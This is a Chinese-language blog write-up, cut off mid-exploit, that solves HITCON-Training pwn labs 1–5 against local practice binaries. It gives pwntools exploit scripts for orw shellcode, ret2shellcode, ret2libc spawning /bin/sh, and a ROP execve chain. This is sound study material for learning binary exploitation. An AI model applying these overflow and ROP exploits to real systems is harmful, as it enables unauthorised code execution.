<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">





  <link rel="alternate" href="/atom.xml" title="n0va" type="application/atom+xml">






<meta name="description" content="lab1方法1：逆向破解，因为题目给了.c文件，里面有key和cipher可以直接用123456key = &quot;Do_you_know_why_my_teammate_Orange_is_so_angry???&quot;cipher = [7, 59, 25, 2, 11, 16, 61, 30, 9, 8, 18, 45, 40, 89, 10, 0, 30, 22, 0, 4, 85, 22, 8, 3">
<meta property="og:type" content="article">
<meta property="og:title" content="Hitcon-Training lab1~lab9">
<meta property="og:url" content="http://yoursite.com/2019/04/04/Hitcon-Training/index.html">
<meta property="og:site_name" content="n0va">
<meta property="og:description" content="lab1方法1：逆向破解，因为题目给了.c文件，里面有key和cipher可以直接用123456key = &quot;Do_you_know_why_my_teammate_Orange_is_so_angry???&quot;cipher = [7, 59, 25, 2, 11, 16, 61, 30, 9, 8, 18, 45, 40, 89, 10, 0, 30, 22, 0, 4, 85, 22, 8, 3">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-e809aec7c4485e87.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-9c69b4d18ca86e5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-ed799d2870fbea25.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-175fc0265d247155.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-c9490d116fd16d11.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-d3da53082e179a5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-a0c1a27906ca8035.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-a56a3c1682666a77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-aca9c8174851cb40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-02ef00722c2c807e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-71ce4c9f41f4aac0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-5ee55626587af8ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-d7d69189fb316410.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-6a51e961975bba99.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-4db63816d836c780.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-499a4f330211bdf6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-3c8d1984f1c1109d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-238ab53f4ae03dc0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-90b814588bc8fd5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-0eb9c0b2e4dee02e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12343640-bae67728a9758224.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-04-04T08:48:32.396Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Hitcon-Training lab1~lab9">
<meta name="twitter:description" content="lab1方法1：逆向破解，因为题目给了.c文件，里面有key和cipher可以直接用123456key = &quot;Do_you_know_why_my_teammate_Orange_is_so_angry???&quot;cipher = [7, 59, 25, 2, 11, 16, 61, 30, 9, 8, 18, 45, 40, 89, 10, 0, 30, 22, 0, 4, 85, 22, 8, 3">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/12343640-e809aec7c4485e87.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/04/04/Hitcon-Training/">





  <title>Hitcon-Training lab1~lab9 | n0va</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">n0va</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/04/04/Hitcon-Training/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="n0va">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/n0va.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="n0va">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Hitcon-Training lab1~lab9</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-04T16:23:04+08:00">
                2019-04-04
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="lab1"><a href="#lab1" class="headerlink" title="lab1"></a>lab1</h2><p>方法1：逆向破解，因为题目给了.c文件，里面有key和cipher可以直接用<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">key = <span class="string">"Do_you_know_why_my_teammate_Orange_is_so_angry???"</span></span><br><span class="line">cipher = [<span class="number">7</span>, <span class="number">59</span>, <span class="number">25</span>, <span class="number">2</span>, <span class="number">11</span>, <span class="number">16</span>, <span class="number">61</span>, <span class="number">30</span>, <span class="number">9</span>, <span class="number">8</span>, <span class="number">18</span>, <span class="number">45</span>, <span class="number">40</span>, <span class="number">89</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">30</span>, <span class="number">22</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">85</span>, <span class="number">22</span>, <span class="number">8</span>, <span class="number">31</span>, <span class="number">7</span>, <span class="number">1</span>, <span class="number">9</span>, <span class="number">0</span>, <span class="number">126</span>, <span class="number">28</span>, <span class="number">62</span>, <span class="number">10</span>, <span class="number">30</span>, <span class="number">11</span>, <span class="number">107</span>, <span class="number">4</span>, <span class="number">66</span>, <span class="number">60</span>, <span class="number">44</span>, <span class="number">91</span>, <span class="number">49</span>, <span class="number">85</span>, <span class="number">2</span>, <span class="number">30</span>, <span class="number">33</span>, <span class="number">16</span>, <span class="number">76</span>, <span class="number">30</span>, <span class="number">66</span>]</span><br><span class="line">flag = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(cipher)):</span><br><span class="line">	flag += chr(cipher[i]^ord(key[i]))</span><br><span class="line"><span class="keyword">print</span> flag</span><br></pre></td></tr></table></figure></p>
<p>方法2：利用gdb动态调试，可以在已生成password且未输入magic的情况下获得password的值：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">在0x80486e7处下断点，可以看到ebp - 0x80就是password存放的地方</span><br><span class="line">► 0x80486e7 &lt;get_flag+332&gt;    lea    eax, [ebp - 0x80]</span><br><span class="line">  0x80486ea &lt;get_flag+335&gt;    push   eax</span><br><span class="line">  0x80486eb &lt;get_flag+336&gt;    push   dword ptr [ebp - 0x74]</span><br><span class="line">  0x80486ee &lt;get_flag+339&gt;    call   read@plt &lt;0x8048410&gt;</span><br><span class="line">再运行到0x8048712处，可以查看 ebp - 0x80的值 </span><br><span class="line">pwndbg&gt; x/wx ($ebp -0x80)</span><br><span class="line">0xffffcd08:	0x4f77e43c</span><br><span class="line">转成十进制，输入就能得到flag</span><br><span class="line">pwndbg&gt; c</span><br><span class="line">Continuing.</span><br><span class="line">1333257276  </span><br><span class="line">CTF&#123;debugger_1s_so_p0werful_1n_dyn4m1c_4n4lySis!&#125;[Inferior 1 (process 7593) exited normally]</span><br></pre></td></tr></table></figure></p>
<p>方法3：<br>同样利用gdb调试，但是这次不用获取password的值而直接在if跳转前设置eip的值指向flag输出的for 循环即可</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-e809aec7c4485e87.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-9c69b4d18ca86e5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<a id="more"></a>
<h2 id="lab2"><a href="#lab2" class="headerlink" title="lab2"></a>lab2</h2><p>checksec 一波，只开了 canary</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-ed799d2870fbea25.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>到IDA里看一波，程序逻辑很简单，就是让你输入一个shellcode然后执行它，但是这里需要注意orw_seccomp函数，里面有个prctl会限制部分syscall的调用，只能通过open ,read , write 到获得flag，不是很懂prctl的第一个参数的数值代表什么，就估且当做是第n个的代号吧,往下数到第22个</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-175fc0265d247155.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>既然只能读写，那就不能用system(/bin/cat flag)去获取flag，这里我们需要自己写shellcode：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fp = open(<span class="string">"flag"</span>,<span class="number">0</span>)</span><br><span class="line">read(fp,buf,<span class="number">0x30</span>)</span><br><span class="line">write(<span class="number">1</span>,buf,<span class="number">0x30</span>)</span><br></pre></td></tr></table></figure></p>
<p>首先我们要查到open,read,write三个函数对应的系统调用号和参数应该调入的寄存器：<a href="http://syscalls.kernelgrok.com/" target="_blank" rel="noopener">linux syscall</a></p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-c9490d116fd16d11.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>接下来写shellcode：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">fp = open(&quot;flag&quot;,0)</span><br><span class="line">push 0               0截断：这个0是必需的，这样才能截断字符串的读取</span><br><span class="line">push 0x67616c66      &quot;flag&quot;</span><br><span class="line">mov ebx,esp           open的第一个参数 &quot;flag&quot;</span><br><span class="line">xor ecx,ecx           将ecx清0，做为open的第二个参数</span><br><span class="line">mov eax,0x5           open的系统调用号</span><br><span class="line">int 0x80              中断，进入系统调用</span><br><span class="line"></span><br><span class="line">read(fp,buf,0x30)     </span><br><span class="line">mov ebx,eax               系统调用结束 ，将返回值存入eax，（open的返回值为fp,而fp为read的第一个参数）将ebx赋值为fp，做为read的第一个参数</span><br><span class="line">mov ecx,esp               将栈顶传给ecx做为read的第二个参数</span><br><span class="line">mov edx,0x30              read的第三个参数0x30</span><br><span class="line">xor eax,eax               清空eax</span><br><span class="line">mov eax,0x3               read的系统调用号</span><br><span class="line">int 0x80                  中断，进入系统调用</span><br><span class="line"></span><br><span class="line">write(1,buf,0x30)（因为write的第二个参数跟read的一样，所以这里可以不用再传一次）</span><br><span class="line">mov ebx,1     write的第1个参数</span><br><span class="line">mov edx,0x30  write的第三个参数</span><br><span class="line">mov eax,0x4   write的系统调用号</span><br><span class="line">int 0x80      中断，进入系统 调用</span><br></pre></td></tr></table></figure></p>
<p>因为自己踩过坑，这里补充一下<code>0截断</code>，也就是在push “flag”之前 为什么要<code>push 0</code>：<br>字符串在读取的时候总是以<code>\x00</code>作为结束标志，如果不先<code>push 0</code>，那么它会将后面的东西也当做字符串读取进来，这样会导致系统读到的文件名不是”flag”，而是”flag…..”后面还有东西，这样就会找不到flag，这里read的返回值就为-1。</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-d3da53082e179a5f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-a0c1a27906ca8035.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>这样，shellcode就写完了，exp如下 ：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">'./orw.bin'</span>)</span><br><span class="line">shellcode = <span class="string">'''</span></span><br><span class="line"><span class="string">push 0</span></span><br><span class="line"><span class="string">push 0x67616c66</span></span><br><span class="line"><span class="string">mov ebx,esp</span></span><br><span class="line"><span class="string">xor ecx,ecx</span></span><br><span class="line"><span class="string">mov eax,0x5</span></span><br><span class="line"><span class="string">int 0x80</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov ebx,eax</span></span><br><span class="line"><span class="string">mov ecx,esp</span></span><br><span class="line"><span class="string">mov edx,0x30</span></span><br><span class="line"><span class="string">xor eax,eax</span></span><br><span class="line"><span class="string">mov eax,0x3</span></span><br><span class="line"><span class="string">int 0x80</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">mov ebx,1</span></span><br><span class="line"><span class="string">mov edx,0x30</span></span><br><span class="line"><span class="string">mov eax,0x4</span></span><br><span class="line"><span class="string">int 0x80</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="keyword">print</span> asm(shellcode)</span><br><span class="line">pause()</span><br><span class="line">p.recvuntil(<span class="string">":"</span>)</span><br><span class="line">gdb.attach(p,<span class="string">"b *0x08048582"</span>)</span><br><span class="line">pause()</span><br><span class="line">p.sendline(asm(shellcode))</span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="lab3"><a href="#lab3" class="headerlink" title="lab3"></a>lab3</h2><p>这一题很简单，第一次输入写进了bss段，第二次输入用gets函数，所以我们只需要在第一次输入的时候输入shellcode，第二次输入将返回地址覆盖成bss段的地址就行，需要注意的是,s的偏移并不是0x14，而是0x1c，如果 IDA 看不出来可以在gdb下信断点查看</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-a56a3c1682666a77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">'./ret2sc'</span>)</span><br><span class="line">shellcode_addr = <span class="number">0x0804A060</span></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">p.recvuntil(<span class="string">":"</span>)</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">":"</span>)</span><br><span class="line">payload = <span class="string">"A"</span> * <span class="number">0x1c</span> + p32(<span class="number">0</span>) + p32(shellcode_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="lab4"><a href="#lab4" class="headerlink" title="lab4"></a>lab4</h2><p>两次输入，第一次输入一个地址，然后程序打印出地址的内容，这可以想到将puts_got地址输入就可以拿到puts函数的真实，先checksec一波</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-aca9c8174851cb40.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>一道简单的ret2libc，那么接下来思路很简单，第一次输入给puts_got地址，拿到puts函数的真实地址，再得到puts函数的libc地址就可以算出偏移，之后 就可以为所欲为的得到其它函数的真实地址了；先找一下库文件：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-02ef00722c2c807e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>接下来解决两个小问题：<br>1、查找 字符串”\bin\sh”<br>2、爆出第二次输入的偏移<br>字符串的查找可以用pwntools<code>binsh_libc = libc.search(&#39;/bin/sh&#39;).next()</code><br>偏移的获得用<code>cyclic 参数</code>生成一串字符之后 ，在gdb中输入得到一个地址，再用<code>cyclic -l 地址</code>即可得到到ret的偏移：</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-71ce4c9f41f4aac0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>exp:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./ret2lib'</span>)</span><br><span class="line">elf = ELF(<span class="string">'./ret2lib'</span>)</span><br><span class="line">libc = ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>)</span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> str(puts_got)    <span class="comment">#134520860</span></span><br><span class="line">pause()</span><br><span class="line">p.sendline(str(puts_got))</span><br><span class="line">p.recvuntil(<span class="string">": "</span>)</span><br><span class="line">puts_addr = int(p.recv(<span class="number">10</span>),<span class="number">16</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_addr:"</span> + hex(puts_addr)</span><br><span class="line">puts_libc = libc.symbols[<span class="string">'puts'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"puts_libc:"</span> + hex(puts_libc)</span><br><span class="line">system_libc = libc.symbols[<span class="string">'system'</span>]</span><br><span class="line"><span class="keyword">print</span> <span class="string">"system_libc:"</span> + hex(system_libc)</span><br><span class="line">binsh_libc = libc.search(<span class="string">'/bin/sh'</span>).next()     查找 <span class="string">"/bin/sh"</span> 的地址</span><br><span class="line"><span class="keyword">print</span> <span class="string">"binsh_libc:"</span> + hex(binsh_libc)</span><br><span class="line">offset = puts_addr - puts_libc    <span class="comment">#偏移</span></span><br><span class="line">system_addr = offset + system_libc</span><br><span class="line">binsh_addr = offset + binsh_libc</span><br><span class="line"><span class="comment"># main = 0x804857D</span></span><br><span class="line">ret= <span class="number">0xdeadbeef</span>  <span class="comment">#返回地址随意</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">"A"</span> * <span class="number">60</span></span><br><span class="line">payload += p32(system_addr) + p32(ret) + p32(binsh_addr)</span><br><span class="line"><span class="comment"># payload += p32(system_addr) + 'b' * 4 + p32(binsh_addr)</span></span><br><span class="line"><span class="comment"># gdb.attach(p,"b *0x0804862F")</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<h2 id="lab5"><a href="#lab5" class="headerlink" title="lab5"></a>lab5</h2><p>先checksec 一波</p>
<p><img src="https://upload-images.jianshu.io/upload_images/12343640-5ee55626587af8ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>开启了NX保护，静态链接，溢出的空间也够构造rop链，一看就是return to syscall，但是没有发现system函数，也没有”/bin/sh”，这就需要我们自己写execve(“/bin/sh”)了<br>我的思路是这样：将”/bin/sh”构造在bss段作为execve的参数，然后进入系统调用execve；<br>那么我们先要找到一个可以写到内存的gadget：<code>0x0807b301 : mov dword ptr [eax], edx ; ret</code>,bss段的写入就跟之前的没什么两样，找到gadget：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">0x080bae06 : pop eax ; ret</span><br><span class="line">0x0806e82a : pop edx ; ret</span><br><span class="line">0x0806e850 : pop edx ; pop ecx ; pop ebx ; ret</span><br></pre></td></tr></table></figure></p>
<p>这里还需要找到 int 0x80 <figure class="highlight plain"><figcaption><span>: int 0x80```系统中断调用</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">这里还需要查一下sys_execve函数的系统调用号和参数对应的寄存器：</span><br><span class="line"></span><br><span class="line">![image.png](https://upload-images.jianshu.io/upload_images/12343640-872bc99fa961056a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)</span><br><span class="line"></span><br><span class="line">接下来就开始构造rop了：</span><br><span class="line">exp:</span><br><span class="line">```python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">from pwn import *</span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">p = process(&apos;./simplerop&apos;)</span><br><span class="line">elf = ELF(&apos;./simplerop&apos;)</span><br><span class="line">bss = 0x080EAF80</span><br><span class="line">binsh = &quot;/bin/sh\x00&quot;</span><br><span class="line">mov_ineax = 0x0807b301</span><br><span class="line"># mov_eax_ecx = 0x080a7a6a</span><br><span class="line">pop_edx_ecx_ebx = 0x0806e850</span><br><span class="line">pop_eax = 0x080bae06</span><br><span class="line">pop_ebx = 0x080481c9</span><br><span class="line">pop_edx = 0x0806e82a</span><br><span class="line">int0x80 = 0x080493e1</span><br><span class="line">payload = &quot;A&quot; * 32    </span><br><span class="line">#将&quot;/bin/sh\x00&quot;分两次写入bss段</span><br><span class="line">payload += p32(pop_eax) + p32(bss)</span><br><span class="line">payload += p32(pop_edx) + binsh[0:4]</span><br><span class="line">payload += 